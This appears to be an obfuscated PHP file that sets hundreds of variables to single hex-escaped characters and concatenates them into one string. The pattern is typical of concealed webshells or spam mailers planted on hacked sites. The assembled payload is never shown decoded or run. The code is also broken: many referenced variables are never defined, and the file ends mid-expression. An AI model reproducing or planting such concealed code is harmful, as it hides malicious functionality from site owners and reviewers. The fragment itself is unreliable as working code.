$fkoi842="\x61";$fkoi134="\x65";$fkoi700="\x61";$fkoi553="\x6e";$fkoi1094="\x0a";
$fkoi1513="\x34";$fkoi670="\x69";$fkoi268="\x20";$fkoi839="\x24";$fkoi1198="\x2b";$fkoi1009="\x3b";
$fkoi1077="\x09";$fkoi1148="\x66";$fkoi418="\x20";$fkoi1535="\x69";$fkoi1452="\x67";$fkoi121="\x20";
$fkoi1187="\x6e";$fkoi522="\x68";$fkoi314="\x20";
$fkoi1131="\x24";
$fkoi1271="\x3d";$fkoi811="\x20";
$fkoi51="\x61";$fkoi1006="\x69";$fkoi525="\x5f";$fkoi459="\x77";$fkoi1542="\x65";$fkoi290="\x63";$fkoi1319="\x3d";$fkoi1662="\x6e";$fkoi1206="\x09";$fkoi890="\x09";
$fkoi1049="\x6f";$fkoi1354="\x0a";
$fkoi2="\x6d";$fkoi1155="\x20";
$fkoi1199="\x20";$fkoi404="\x73";$fkoi1491="\x6f";$fkoi1663="\x74";
$fkoi384="\x2c";$fkoi1650="\x61";$fkoi156="\x79";$fkoi1092="\x65";
$fkoi470="\x65";
$fkoi601="\x6d";
$fkoi679="\x73";$fkoi722="\x20";$fkoi1624="\x6d";$fkoi248="\x3b";$fkoi259="\x20";$fkoi1585="\x20";
$fkoi1377="\x24";$fkoi1638="\x5f";$fkoi71="\x73";$fkoi97="\x41";$fkoi1214="\x20";
$fkoi1436="\x7d";$fkoi251="\x09";$fkoi1695="\x6e";$fkoi1194="\x28";$fkoi661="\x64";$fkoi1373="\x69";$fkoi1239="\x20";$fkoi1145="\x3b";$fkoi1406="\x6e";$fkoi225="\x28";$fkoi1550="\x69";$fkoi1281="\x20";
$fkoi53="\x74";$fkoi1347="\x67";$fkoi1083="\x75";$fkoi931="\x20";$fkoi331="\x6e";
$fkoi497="\x64";$fkoi175="\x79";$fkoi1122="\x65";$fkoi10="\x72";$fkoi155="\x6d";$fkoi906="\x76";$fkoi588="\x64";$fkoi1482="\x2c";$fkoi193="\x69";$fkoi221="\x72";$fkoi82="\x6f";$fkoi836="\x20";$fkoi1670="\x3b";$fkoi777="\x64";$fkoi45="\x30";
$fkoi1391="\x24";$fkoi1620="\x4f";$fkoi1625="\x65";$fkoi296="\x6c";$fkoi510="\x65";$fkoi1521="\x74";$fkoi1504="\x20";
$fkoi951="\x69";
$fkoi1508="\x70";$fkoi1478="\x63";$fkoi1272="\x20";
$fkoi1665="\x4f";$fkoi922="\x0a";$fkoi508="\x6f";$fkoi1300="\x6e";
$fkoi1274="\x24";$fkoi760="\x66";$fkoi311="\x66";$fkoi461="\x77";$fkoi895="\x6f";$fkoi317="\x69";
$fkoi103="\x67";$fkoi753="\x20";
$fkoi963="\x2b";$fkoi1185="\x20";$fkoi748="\x64";$fkoi345="\x2b";$fkoi1257="\x09";$fkoi343="\x20";$fkoi1582="\x24";$fkoi1053="\x2e";$fkoi851="\x3b";$fkoi374="\x28";$fkoi920="\x22";$fkoi1014="\x09";
$fkoi529="\x65";$fkoi1140="\x20";$fkoi1669="\x63";$fkoi961="\x30";$fkoi1443="\x72";$fkoi436="\x61";
$fkoi1242="\x40";$fkoi681="\x64";$fkoi102="\x69";$fkoi432="\x69";$fkoi1216="\x69";
$fkoi629="\x3b";
$fkoi1448="\x74";$fkoi346="\x24";$fkoi606="\x63";$fkoi950="\x28";
$fkoi684="\x22";$fkoi420="\x61";
$fkoi253="\x20";$fkoi527="\x61";$fkoi1201="\x29";$fkoi492="\x65";$fkoi1071="\x6d";$fkoi598="\x3b";$fkoi74="\x67";$fkoi955="\x72";$fkoi929="\x64";$fkoi891="\x09";
$fkoi339="\x64";$fkoi1275="\x61";
$fkoi232="\x25";$fkoi883="\x2b";$fkoi602="\x79";
$fkoi634="\x3c";$fkoi506="\x20";$fkoi183="\x3b";$fkoi1485="\x65";$fkoi482="\x6f";$fkoi11="\x6c";
$fkoi912="\x6d";$fkoi4="\x72";$fkoi479="\x6d";
$fkoi1653="\x6f";$fkoi675="\x22";$fkoi572="\x09";
$fkoi1352="\x22";$fkoi23="\x6d";$fkoi565="\x69";
$fkoi228="\x6d";$fkoi1219="\x3d";$fkoi719="\x69";$fkoi28="\x69";
$fkoi141="\x20";$fkoi110="\x73";$fkoi1430="\x37";$fkoi406="\x20";$fkoi1469="\x65";$fkoi1458="\x23";$fkoi592="\x72";$fkoi1192="\x6e";
$fkoi118="\x61";$fkoi132="\x72";$fkoi1450="\x69";$fkoi372="\x74";$fkoi821="\x72";$fkoi863="\x20";
$fkoi949="\x20";$fkoi857="\x20";$fkoi76="\x6e";$fkoi507="\x63";$fkoi150="\x68";$fkoi340="\x65";$fkoi828="\x6d";$fkoi903="\x5c";$fkoi514="\x74";$fkoi463="\x20";
$fkoi35="\x69";$fkoi292="\x20";$fkoi269="\x6f";$fkoi1191="\x61";$fkoi1351="\x22";$fkoi1355="\x09";$fkoi573="\x24";$fkoi1025="\x22";$fkoi452="\x6b";$fkoi676="\x5c";$fkoi549="\x20";$fkoi174="\x6d";$fkoi41="\x29";$fkoi144="\x74";
$fkoi1328="\x64";$fkoi1183="\x20";
$fkoi609="\x65";
$fkoi1474="\x69";$fkoi682="\x3d";
$fkoi375="\x24";$fkoi1551="\x7a";
$fkoi750="\x20";$fkoi570="\x3b";$fkoi1584="\x63";$fkoi1022="\x2e";$fkoi1686="\x63";
$fkoi21="\x65";$fkoi1066="\x61";
$fkoi541="\x40";$fkoi111="\x65";$fkoi1353="\x3b";$fkoi1341="\x24";
$fkoi886="\x29";$fkoi986="\x20";$fkoi774="\x72";$fkoi994="\x2e";$fkoi428="\x20";$fkoi307="\x70";$fkoi632="\x69";$fkoi1566="\x20";
$fkoi1525="\x73";$fkoi1393="\x74";$fkoi1034="\x72";$fkoi1057="\x65";$fkoi984="\x64";$fkoi1112="\x74";
$fkoi1240="\x3d";$fkoi772="\x74";$fkoi194="\x70";$fkoi1307="\x6e";
$fkoi1645="\x67";$fkoi691="\x78";
$fkoi703="\x6e";$fkoi783="\x31";$fkoi355="\x75";$fkoi1296="\x62";$fkoi392="\x70";$fkoi1287="\x09";$fkoi1661="\x69";$fkoi1195="\x24";$fkoi1261="\x32";$fkoi284="\x72";$fkoi1119="\x66";$fkoi804="\x6c";$fkoi1100="\x75";$fkoi279="\x72";$fkoi1400="\x3d";$fkoi138="\x73";$fkoi1203="\x3b";$fkoi115="\x64";$fkoi1221="\x24";
$fkoi173="\x09";$fkoi394="\x73";$fkoi785="\x29";
$fkoi1675="\x73";$fkoi1549="\x73";$fkoi124="\x66";$fkoi641="\x72";$fkoi1007="\x2e";
$fkoi214="\x28";$fkoi1655="\x22";$fkoi1294="\x73";$fkoi674="\x28";$fkoi1680="\x0a";$fkoi1024="\x20";$fkoi1312="\x09";
$fkoi1527="\x6f";$fkoi1385="\x29";$fkoi1484="\x6d";$fkoi1058="\x76";$fkoi1639="\x6e";$fkoi581="\x65";$fkoi1019="\x64";$fkoi1537="\x63";$fkoi878="\x70";$fkoi707="\x2c";$fkoi1455="\x7d";$fkoi411="\x09";$fkoi1282="\x24";$fkoi1396="\x6e";$fkoi451="\x63";
$fkoi1555="\x20";$fkoi1113="\x65";$fkoi870="\x3c";
$fkoi486="\x20";$fkoi1085="\x6e";$fkoi1588="\x6d";$fkoi1488="\x73";$fkoi80="\x74";$fkoi518="\x09";$fkoi1564="\x6e";$fkoi550="\x5c";
$fkoi1457="\x0a";$fkoi1459="\x20";$fkoi49="\x65";$fkoi203="\x40";$fkoi1229="\x61";$fkoi712="\x64";$fkoi1462="\x69";$fkoi1042="\x22";$fkoi1683="\x3d";$fkoi1697="\x72";$fkoi61="\x68";$fkoi751="\x2e";$fkoi1684="\x22";$fkoi1541="\x68";
$fkoi217="\x0a";$fkoi1149="\x6f";
$fkoi1426="\x30";$fkoi622="\x28";$fkoi326="\x20";$fkoi829="\x63";
$fkoi371="\x73";$fkoi1124="\x7b";$fkoi256="\x69";$fkoi1548="\x2d";$fkoi547="\x74";
$fkoi19="\x6f";$fkoi926="\x6d";$fkoi1632="\x68";
$fkoi1708="\x6c";
$fkoi1714="\x0a";$fkoi1181="\x24";
$fkoi972="\x30";$fkoi1633="\x2d";$fkoi952="\x6e";
$fkoi580="\x6d";$fkoi44="\x30";$fkoi1349="\x3d";$fkoi665="\x3d";
$fkoi697="\x20";$fkoi567="\x3d";$fkoi1078="\x0a";$fkoi616="\x0a";$fkoi1453="\x3b";$fkoi540="\x5c";$fkoi816="\x28";$fkoi689="\x30";
$fkoi548="\x2c";$fkoi1295="\x75";$fkoi1503="\x23";$fkoi1220="\x20";$fkoi1334="\x32";$fkoi368="\x73";$fkoi1641="\x6d";$fkoi1159="\x3d";
$fkoi1163="\x61";$fkoi621="\x20";$fkoi1512="\x20";$fkoi1490="\x79";$fkoi971="\x20";$fkoi736="\x69";$fkoi979="\x09";$fkoi947="\x20";$fkoi902="\x22";$fkoi1611="\x6e";$fkoi612="\x20";$fkoi765="\x69";
$fkoi1712="\x63";$fkoi415="\x0a";$fkoi1414="\x2c";$fkoi730="\x72";
$fkoi504="\x63";$fkoi1222="\x6a";
$fkoi656="\x09";$fkoi196="\x20";$fkoi856="\x72";$fkoi791="\x30";$fkoi393="\x75";
$fkoi1223="\x3b";$fkoi724="\x72";
$fkoi1699="\x74";$fkoi526="\x79";$fkoi1375="\x3c";$fkoi430="\x63";$fkoi13="\x50";
$fkoi1114="\x73";
$fkoi1051="\x65";$fkoi1268="\x6a";
$fkoi1170="\x69";$fkoi780="\x30";$fkoi628="\x30";$fkoi409="\x3b";
$fkoi1364="\x24";$fkoi1232="\x24";$fkoi962="\x29";$fkoi381="\x20";$fkoi95="\x23";$fkoi1038="\x6d";$fkoi1164="\x31";$fkoi322="\x3b";$fkoi278="\x61";
$fkoi280="\x61";$fkoi1544="\x63";$fkoi489="\x6e";$fkoi390="\x09";$fkoi569="\x30";$fkoi1054="\x3d";
$fkoi422="\x64";$fkoi161="\x64";$fkoi554="\x64";$fkoi240="\x65";$fkoi1496="\x6c";$fkoi975="\x0a";
$fkoi1613="\x3b";$fkoi640="\x63";
$fkoi363="\x69";$fkoi1234="\x2c";$fkoi389="\x0a";
$fkoi1402="\x73";
$fkoi1167="\x2d";$fkoi954="\x28";$fkoi837="\x22";
$fkoi1284="\x5d";$fkoi1350="\x20";$fkoi1706="\x76";
$fkoi1040="\x27";$fkoi807="\x6c";$fkoi564="\x24";$fkoi472="\x0a";
$fkoi1204="\x0a";$fkoi720="\x5d";$fkoi788="\x3d";$fkoi197="\x3d";$fkoi1546="\x64";$fkoi6="\x2d";$fkoi511="\x20";$fkoi500="\x6f";$fkoi1562="\x77";$fkoi769="\x28";$fkoi1175="\x0a";$fkoi419="\x72";$fkoi911="\x61";$fkoi615="\x3b";$fkoi378="\x64";$fkoi1619="\x28";$fkoi1297="\x20";$fkoi457="\x68";$fkoi990="\x22";$fkoi=$fkoi0.
$fkoi1.$fkoi2.$fkoi3.$fkoi4.$fkoi5.$fkoi6.
$fkoi7.$fkoi8.$fkoi9.
$fkoi10.$fkoi11.$fkoi12.$fkoi13.$fkoi14.$fkoi15.$fkoi16.
$fkoi17.$fkoi18.$fkoi19.$fkoi20.$fkoi21.$fkoi22.
$fkoi23.$fkoi24.
$fkoi25.$fkoi26.$fkoi27.$fkoi28.$fkoi29.$fkoi30.
$fkoi31.$fkoi32.$fkoi33.$fkoi34.$fkoi35.$fkoi36.
$fkoi37.$fkoi38.$fkoi39.$fkoi40.
$fkoi41.$fkoi42.$fkoi43.$fkoi44.$fkoi45.$fkoi46.$fkoi47.$fkoi48.
$fkoi49.$fkoi50.$fkoi51.$fkoi52.$fkoi53.$fkoi54.
$fkoi55.$fkoi56.$fkoi57.$fkoi58.$fkoi59.$fkoi60.
$fkoi61.$fkoi62.$fkoi63.$fkoi64.$fkoi65.$fkoi66.$fkoi67.$fkoi68.$fkoi69.$fkoi70.
$fkoi71.$fkoi72.
$fkoi73.$fkoi74.$fkoi75.$fkoi76.$fkoi77.$fkoi78.$fkoi79.$fkoi80.$fkoi81.
$fkoi82.$fkoi83.$fkoi84.
$fkoi85.$fkoi86.$fkoi87.$fkoi88.$fkoi89.$fkoi90.$fkoi91.$fkoi92.$fkoi93.$fkoi94.$fkoi95.$fkoi96.$fkoi97.$fkoi98.
$fkoi99.
$fkoi100.$fkoi101.$fkoi102.
$fkoi103.$fkoi104.$fkoi105.$fkoi106.$fkoi107.$fkoi108.
$fkoi109.$fkoi110.
$fkoi111.$fkoi112.
$fkoi113.$fkoi114.
$fkoi115.$fkoi116.$fkoi117.$fkoi118.
$fkoi119.$fkoi120.
$fkoi121.$fkoi122.$fkoi123.$fkoi124.
$fkoi125.$fkoi126.$fkoi127.$fkoi128.$fkoi129.$fkoi130.
$fkoi131.$fkoi132.
$fkoi133.$fkoi134.$fkoi135.$fkoi136.$fkoi137.$fkoi138.$fkoi139.$fkoi140.
$fkoi141.$fkoi142.$fkoi143.$fkoi144.
$fkoi145.$fkoi146.$fkoi147.
$fkoi148.$fkoi149.$fkoi150.$fkoi151.$fkoi152.$fkoi153.$fkoi154.
$fkoi155.$fkoi156.$fkoi157.$fkoi158.
$fkoi159.$fkoi160.
$fkoi161.
$fkoi162.$fkoi163.$fkoi164.
$fkoi165.$fkoi166.$fkoi167.$fkoi168.
$fkoi169.$fkoi170.$fkoi171.$fkoi172.$fkoi173.$fkoi174.$fkoi175.$fkoi176.
$fkoi177.$fkoi178.$fkoi179.$fkoi180.$fkoi181.$fkoi182.$fkoi183.
$fkoi184.
$fkoi185.$fkoi186.$fkoi187.$fkoi188.$fkoi189.$fkoi190.
$fkoi191.$fkoi192.
$fkoi193.$fkoi194.$fkoi195.$fkoi196.$fkoi197.$fkoi198.$fkoi199.$fkoi200.$fkoi201.$fkoi202.$fkoi203.$fkoi204.$fkoi205.$fkoi206.$fkoi207.$fkoi208.
$fkoi209.
$fkoi210.$fkoi211.$fkoi212.$fkoi213.$fkoi214.$fkoi215.$fkoi216.$fkoi217.
$fkoi218.$fkoi219.$fkoi220.$fkoi221.$fkoi222.$fkoi223.$fkoi224.
$fkoi225.$fkoi226.$fkoi227.$fkoi228.
$fkoi229.$fkoi230.$fkoi231.$fkoi232.
$fkoi233.$fkoi234.$fkoi235.$fkoi236.
$fkoi237.$fkoi238.
$fkoi239.$fkoi240.$fkoi241.
$fkoi242.$fkoi243.
$fkoi244.$fkoi245.$fkoi246.$fkoi247.$fkoi248.
$fkoi249.
$fkoi250.$fkoi251.$fkoi252.
$fkoi253.$fkoi254.$fkoi255.$fkoi256.$fkoi257.$fkoi258.$fkoi259.
$fkoi260.$fkoi261.$fkoi262.$fkoi263.$fkoi264.$fkoi265.$fkoi266.$fkoi267.$fkoi268.$fkoi269.$fkoi270.$fkoi271.$fkoi272.$fkoi273.$fkoi274.$fkoi275.$fkoi276.$fkoi277.$fkoi278.
$fkoi279.$fkoi280.$fkoi281.$fkoi282.$fkoi283.$fkoi284.$fkoi285.$fkoi286.$fkoi287.$fkoi288.$fkoi289.$fkoi290.$fkoi291.$fkoi292.
$fkoi293.$fkoi294.$fkoi295.$fkoi296.$fkoi297.$fkoi298.$fkoi299.$fkoi300.
$fkoi301.$fkoi302.
$fkoi303.$fkoi304.$fkoi305.$fkoi306.$fkoi307.$fkoi308.
$fkoi309.
$fkoi310.$fkoi311.$fkoi312.
$fkoi313.$fkoi314.$fkoi315.$fkoi316.
$fkoi317.$fkoi318.$fkoi319.$fkoi320.$fkoi321.$fkoi322.
$fkoi323.$fkoi324.$fkoi325.$fkoi326.
$fkoi327.$fkoi328.$fkoi329.$fkoi330.$fkoi331.$fkoi332.$fkoi333.$fkoi334.
$fkoi335.$fkoi336.
$fkoi337.$fkoi338.
$fkoi339.$fkoi340.$fkoi341.
$fkoi342.$fkoi343.$fkoi344.
$fkoi345.
$fkoi346.$fkoi347.$fkoi348.$fkoi349.$fkoi350.$fkoi351.
$fkoi352.$fkoi353.$fkoi354.$fkoi355.
$fkoi356.$fkoi357.$fkoi358.$fkoi359.$fkoi360.
$fkoi361.$fkoi362.$fkoi363.$fkoi364.$fkoi365.
$fkoi366.
$fkoi367.$fkoi368.
$fkoi369.$fkoi370.$fkoi371.$fkoi372.$fkoi373.$fkoi374.$fkoi375.$fkoi376.$fkoi377.$fkoi378.$fkoi379.$fkoi380.$fkoi381.$fkoi382.$fkoi383.$fkoi384.$fkoi385.$fkoi386.$fkoi387.$fkoi388.
$fkoi389.$fkoi390.
$fkoi391.
$fkoi392.$fkoi393.$fkoi394.$fkoi395.$fkoi396.$fkoi397.$fkoi398.
$fkoi399.$fkoi400.$fkoi401.$fkoi402.
$fkoi403.$fkoi404.
$fkoi405.$fkoi406.
$fkoi407.$fkoi408.
$fkoi409.$fkoi410.$fkoi411.
$fkoi412.$fkoi413.$fkoi414.$fkoi415.
$fkoi416.$fkoi417.$fkoi418.$fkoi419.$fkoi420.
$fkoi421.
$fkoi422.$fkoi423.$fkoi424.$fkoi425.$fkoi426.
$fkoi427.$fkoi428.$fkoi429.$fkoi430.$fkoi431.$fkoi432.
$fkoi433.$fkoi434.$fkoi435.$fkoi436.$fkoi437.$fkoi438.$fkoi439.$fkoi440.$fkoi441.$fkoi442.$fkoi443.$fkoi444.
$fkoi445.$fkoi446.$fkoi447.$fkoi448.
$fkoi449.$fkoi450.$fkoi451.$fkoi452.$fkoi453.$fkoi454.$fkoi455.$fkoi456.$fkoi457.$fkoi458.$fkoi459.$fkoi460.$fkoi461.$fkoi462.$fkoi463.$fkoi464.
$fkoi465.$fkoi466.$fkoi467.$fkoi468.$fkoi469.$fkoi470.$fkoi471.$fkoi472.$fkoi473.$fkoi474.$fkoi475.
$fkoi476.$fkoi477.$fkoi478.$fkoi479.$fkoi480.
$fkoi481.$fkoi482.$fkoi483.
$fkoi484.$fkoi485.$fkoi486.
$fkoi487.$fkoi488.$fkoi489.$fkoi490.$fkoi491.$fkoi492.$fkoi493.$fkoi494.$fkoi495.
$fkoi496.$fkoi497.
$fkoi498.$fkoi499.$fkoi500.$fkoi501.$fkoi502.$fkoi503.$fkoi504.$fkoi505.$fkoi506.$fkoi507.$fkoi508.
$fkoi509.$fkoi510.
$fkoi511.$fkoi512.
$fkoi513.$fkoi514.$fkoi515.$fkoi516.$fkoi517.$fkoi518.$fkoi519.$fkoi520.
$fkoi521.$fkoi522.$fkoi523.$fkoi524.$fkoi525.
$fkoi526.$fkoi527.$fkoi528.$fkoi529.$fkoi530.$fkoi531.$fkoi532.$fkoi533.
$fkoi534.
$fkoi535.
$fkoi536.$fkoi537.$fkoi538.$fkoi539.$fkoi540.$fkoi541.$fkoi542.$fkoi543.$fkoi544.$fkoi545.$fkoi546.
$fkoi547.$fkoi548.
$fkoi549.$fkoi550.$fkoi551.$fkoi552.$fkoi553.$fkoi554.$fkoi555.$fkoi556.$fkoi557.$fkoi558.
$fkoi559.$fkoi560.
$fkoi561.$fkoi562.$fkoi563.$fkoi564.
$fkoi565.$fkoi566.
$fkoi567.$fkoi568.$fkoi569.$fkoi570.
$fkoi571.$fkoi572.
$fkoi573.
$fkoi574.
$fkoi575.$fkoi576.
$fkoi577.$fkoi578.$fkoi579.$fkoi580.
$fkoi581.$fkoi582.
$fkoi583.$fkoi584.$fkoi585.$fkoi586.$fkoi587.$fkoi588.$fkoi589.$fkoi590.$fkoi591.$fkoi592.$fkoi593.$fkoi594.$fkoi595.$fkoi596.$fkoi597.$fkoi598.$fkoi599.$fkoi600.
$fkoi601.$fkoi602.$fkoi603.$fkoi604.$fkoi605.
$fkoi606.$fkoi607.$fkoi608.$fkoi609.$fkoi610.$fkoi611.
$fkoi612.$fkoi613.$fkoi614.$fkoi615.$fkoi616.$fkoi617.$fkoi618.$fkoi619.$fkoi620.
$fkoi621.$fkoi622.$fkoi623.$fkoi624.$fkoi625.
$fkoi626.$fkoi627.$fkoi628.$fkoi629.$fkoi630.$fkoi631.$fkoi632.$fkoi633.$fkoi634.$fkoi635.$fkoi636.$fkoi637.$fkoi638.$fkoi639.$fkoi640.$fkoi641.$fkoi642.$fkoi643.$fkoi644.$fkoi645.$fkoi646.$fkoi647.$fkoi648.$fkoi649.$fkoi650.
$fkoi651.$fkoi652.$fkoi653.$fkoi654.$fkoi655.
$fkoi656.
$fkoi657.
$fkoi658.$fkoi659.$fkoi660.$fkoi661.$fkoi662.$fkoi663.
$fkoi664.$fkoi665.$fkoi666.$fkoi667.$fkoi668.$fkoi669.$fkoi670.$fkoi671.$fkoi672.$fkoi673.$fkoi674.$fkoi675.
$fkoi676.
$fkoi677.$fkoi678.$fkoi679.$fkoi680.$fkoi681.$fkoi682.$fkoi683.$fkoi684.$fkoi685.
$fkoi686.$fkoi687.$fkoi688.
$fkoi689.$fkoi690.$fkoi691.$fkoi692.$fkoi693.$fkoi694.$fkoi695.$fkoi696.$fkoi697.$fkoi698.$fkoi699.$fkoi700.
$fkoi701.$fkoi702.$fkoi703.$fkoi704.
$fkoi705.$fkoi706.$fkoi707.$fkoi708.$fkoi709.$fkoi710.
$fkoi711.
$fkoi712.$fkoi713.$fkoi714.$fkoi715.$fkoi716.$fkoi717.$fkoi718.$fkoi719.$fkoi720.
$fkoi721.$fkoi722.$fkoi723.$fkoi724.$fkoi725.$fkoi726.$fkoi727.$fkoi728.$fkoi729.$fkoi730.$fkoi731.$fkoi732.
$fkoi733.$fkoi734.$fkoi735.
$fkoi736.$fkoi737.$fkoi738.
$fkoi739.$fkoi740.$fkoi741.$fkoi742.$fkoi743.$fkoi744.$fkoi745.
$fkoi746.
$fkoi747.$fkoi748.$fkoi749.$fkoi750.$fkoi751.$fkoi752.$fkoi753.$fkoi754.$fkoi755.$fkoi756.$fkoi757.$fkoi758.$fkoi759.
$fkoi760.
$fkoi761.$fkoi762.$fkoi763.$fkoi764.$fkoi765.$fkoi766.
$fkoi767.$fkoi768.
$fkoi769.$fkoi770.$fkoi771.
$fkoi772.$fkoi773.$fkoi774.$fkoi775.$fkoi776.$fkoi777.$fkoi778.$fkoi779.$fkoi780.$fkoi781.
$fkoi782.$fkoi783.$fkoi784.$fkoi785.$fkoi786.
$fkoi787.$fkoi788.$fkoi789.$fkoi790.$fkoi791.$fkoi792.
$fkoi793.$fkoi794.$fkoi795.$fkoi796.$fkoi797.$fkoi798.
$fkoi799.$fkoi800.$fkoi801.$fkoi802.$fkoi803.$fkoi804.$fkoi805.$fkoi806.$fkoi807.$fkoi808.$fkoi809.$fkoi810.$fkoi811.
$fkoi812.$fkoi813.$fkoi814.$fkoi815.$fkoi816.
$fkoi817.$fkoi818.$fkoi819.$fkoi820.$fkoi821.$fkoi822.$fkoi823.$fkoi824.$fkoi825.$fkoi826.
$fkoi827.$fkoi828.
$fkoi829.$fkoi830.$fkoi831.$fkoi832.$fkoi833.$fkoi834.$fkoi835.$fkoi836.$fkoi837.$fkoi838.$fkoi839.$fkoi840.
$fkoi841.$fkoi842.$fkoi843.$fkoi844.$fkoi845.$fkoi846.$fkoi847.
$fkoi848.$fkoi849.$fkoi850.$fkoi851.$fkoi852.
$fkoi853.$fkoi854.$fkoi855.
$fkoi856.$fkoi857.$fkoi858.
$fkoi859.$fkoi860.$fkoi861.
$fkoi862.
$fkoi863.$fkoi864.
$fkoi865.$fkoi866.$fkoi867.$fkoi868.$fkoi869.$fkoi870.$fkoi871.$fkoi872.$fkoi873.$fkoi874.$fkoi875.$fkoi876.$fkoi877.$fkoi878.$fkoi879.$fkoi880.$fkoi881.$fkoi882.
$fkoi883.$fkoi884.$fkoi885.$fkoi886.$fkoi887.$fkoi888.$fkoi889.$fkoi890.$fkoi891.$fkoi892.$fkoi893.
$fkoi894.$fkoi895.$fkoi896.$fkoi897.$fkoi898.$fkoi899.$fkoi900.$fkoi901.$fkoi902.$fkoi903.$fkoi904.
$fkoi905.$fkoi906.$fkoi907.$fkoi908.$fkoi909.$fkoi910.
$fkoi911.$fkoi912.
$fkoi913.$fkoi914.$fkoi915.$fkoi916.$fkoi917.$fkoi918.$fkoi919.$fkoi920.$fkoi921.
$fkoi922.$fkoi923.$fkoi924.$fkoi925.$fkoi926.$fkoi927.$fkoi928.$fkoi929.$fkoi930.$fkoi931.
$fkoi932.$fkoi933.$fkoi934.$fkoi935.
$fkoi936.
$fkoi937.$fkoi938.$fkoi939.$fkoi940.$fkoi941.$fkoi942.$fkoi943.$fkoi944.$fkoi945.
$fkoi946.$fkoi947.$fkoi948.$fkoi949.$fkoi950.
$fkoi951.$fkoi952.$fkoi953.$fkoi954.$fkoi955.
$fkoi956.$fkoi957.$fkoi958.$fkoi959.$fkoi960.
$fkoi961.
$fkoi962.
$fkoi963.$fkoi964.$fkoi965.$fkoi966.$fkoi967.$fkoi968.
$fkoi969.
$fkoi970.$fkoi971.
$fkoi972.$fkoi973.
$fkoi974.$fkoi975.
$fkoi976.
$fkoi977.$fkoi978.$fkoi979.$fkoi980.
$fkoi981.$fkoi982.$fkoi983.$fkoi984.
$fkoi985.$fkoi986.$fkoi987.$fkoi988.
$fkoi989.$fkoi990.
$fkoi991.$fkoi992.$fkoi993.$fkoi994.$fkoi995.$fkoi996.$fkoi997.$fkoi998.$fkoi999.$fkoi1000.
$fkoi1001.$fkoi1002.$fkoi1003.$fkoi1004.$fkoi1005.
$fkoi1006.$fkoi1007.
$fkoi1008.
$fkoi1009.$fkoi1010.$fkoi1011.$fkoi1012.$fkoi1013.$fkoi1014.
$fkoi1015.$fkoi1016.$fkoi1017.$fkoi1018.$fkoi1019.$fkoi1020.
$fkoi1021.$fkoi1022.$fkoi1023.$fkoi1024.$fkoi1025.$fkoi1026.$fkoi1027.$fkoi1028.$fkoi1029.$fkoi1030.$fkoi1031.$fkoi1032.
$fkoi1033.$fkoi1034.
$fkoi1035.
$fkoi1036.$fkoi1037.
$fkoi1038.$fkoi1039.$fkoi1040.
$fkoi1041.$fkoi1042.$fkoi1043.
$fkoi1044.$fkoi1045.$fkoi1046.$fkoi1047.
$fkoi1048.
$fkoi1049.$fkoi1050.$fkoi1051.$fkoi1052.$fkoi1053.$fkoi1054.$fkoi1055.$fkoi1056.
$fkoi1057.$fkoi1058.$fkoi1059.$fkoi1060.
$fkoi1061.$fkoi1062.
$fkoi1063.$fkoi1064.$fkoi1065.
$fkoi1066.
$fkoi1067.
$fkoi1068.$fkoi1069.$fkoi1070.
$fkoi1071.$fkoi1072.
$fkoi1073.$fkoi1074.
$fkoi1075.$fkoi1076.$fkoi1077.$fkoi1078.$fkoi1079.$fkoi1080.
$fkoi1081.$fkoi1082.$fkoi1083.$fkoi1084.
$fkoi1085.$fkoi1086.$fkoi1087.$fkoi1088.$fkoi1089.$fkoi1090.$fkoi1091.$fkoi1092.$fkoi1093.$fkoi1094.$fkoi1095.$fkoi1096.$fkoi1097.$fkoi1098.$fkoi1099.$fkoi1100.
$fkoi1101.$fkoi1102.$fkoi1103.$fkoi1104.$fkoi1105.
$fkoi1106.$fkoi1107.$fkoi1108.$fkoi1109.$fkoi1110.$fkoi1111.$fkoi1112.$fkoi1113.$fkoi1114.$fkoi1115.$fkoi1116.$fkoi1117.$fkoi1118.$fkoi1119.$fkoi1120.$fkoi1121.$fkoi1122.
$fkoi1123.$fkoi1124.$fkoi1125.$fkoi1126.$fkoi1127.$fkoi1128.$fkoi1129.$fkoi1130.$fkoi1131.$fkoi1132.$fkoi1133.$fkoi1134.
$fkoi1135.$fkoi1136.
$fkoi1137.$fkoi1138.$fkoi1139.$fkoi1140.
$fkoi1141.$fkoi1142.
$fkoi1143.$fkoi1144.$fkoi1145.$fkoi1146.$fkoi1147.$fkoi1148.$fkoi1149.$fkoi1150.$fkoi1151.$fkoi1152.
$fkoi1153.$fkoi1154.$fkoi1155.$fkoi1156.$fkoi1157.$fkoi1158.$fkoi1159.$fkoi1160.$fkoi1161.$fkoi1162.$fkoi1163.$fkoi1164.$fkoi1165.$fkoi1166.$fkoi1167.$fkoi1168.$fkoi1169.$fkoi1170.$fkoi1171.$fkoi1172.$fkoi1173.$fkoi1174.$fkoi1175.$fkoi1176.
$fkoi1177.$fkoi1178.$fkoi1179.
$fkoi1180.
$fkoi1181.$fkoi1182.$fkoi1183.$fkoi1184.$fkoi1185.$fkoi1186.
$fkoi1187.$fkoi1188.$fkoi1189.$fkoi1190.$fkoi1191.$fkoi1192.$fkoi1193.$fkoi1194.
$fkoi1195.$fkoi1196.$fkoi1197.$fkoi1198.$fkoi1199.$fkoi1200.$fkoi1201.$fkoi1202.$fkoi1203.$fkoi1204.$fkoi1205.
$fkoi1206.$fkoi1207.$fkoi1208.$fkoi1209.$fkoi1210.$fkoi1211.$fkoi1212.$fkoi1213.$fkoi1214.$fkoi1215.$fkoi1216.$fkoi1217.$fkoi1218.$fkoi1219.
$fkoi1220.
$fkoi1221.$fkoi1222.
$fkoi1223.$fkoi1224.
$fkoi1225.$fkoi1226.$fkoi1227.$fkoi1228.$fkoi1229.$fkoi1230.$fkoi1231.$fkoi1232.$fkoi1233.$fkoi1234.$fkoi1235.$fkoi1236.
$fkoi1237.$fkoi1238.$fkoi1239.
$fkoi1240.$fkoi1241.$fkoi1242.
$fkoi1243.$fkoi1244.
$fkoi1245.
$fkoi1246.$fkoi1247.$fkoi1248.$fkoi1249.$fkoi1250.$fkoi1251.$fkoi1252.$fkoi1253.$fkoi1254.$fkoi1255.$fkoi1256.$fkoi1257.$fkoi1258.
$fkoi1259.$fkoi1260.
$fkoi1261.$fkoi1262.$fkoi1263.$fkoi1264.
$fkoi1265.$fkoi1266.$fkoi1267.$fkoi1268.$fkoi1269.$fkoi1270.$fkoi1271.$fkoi1272.
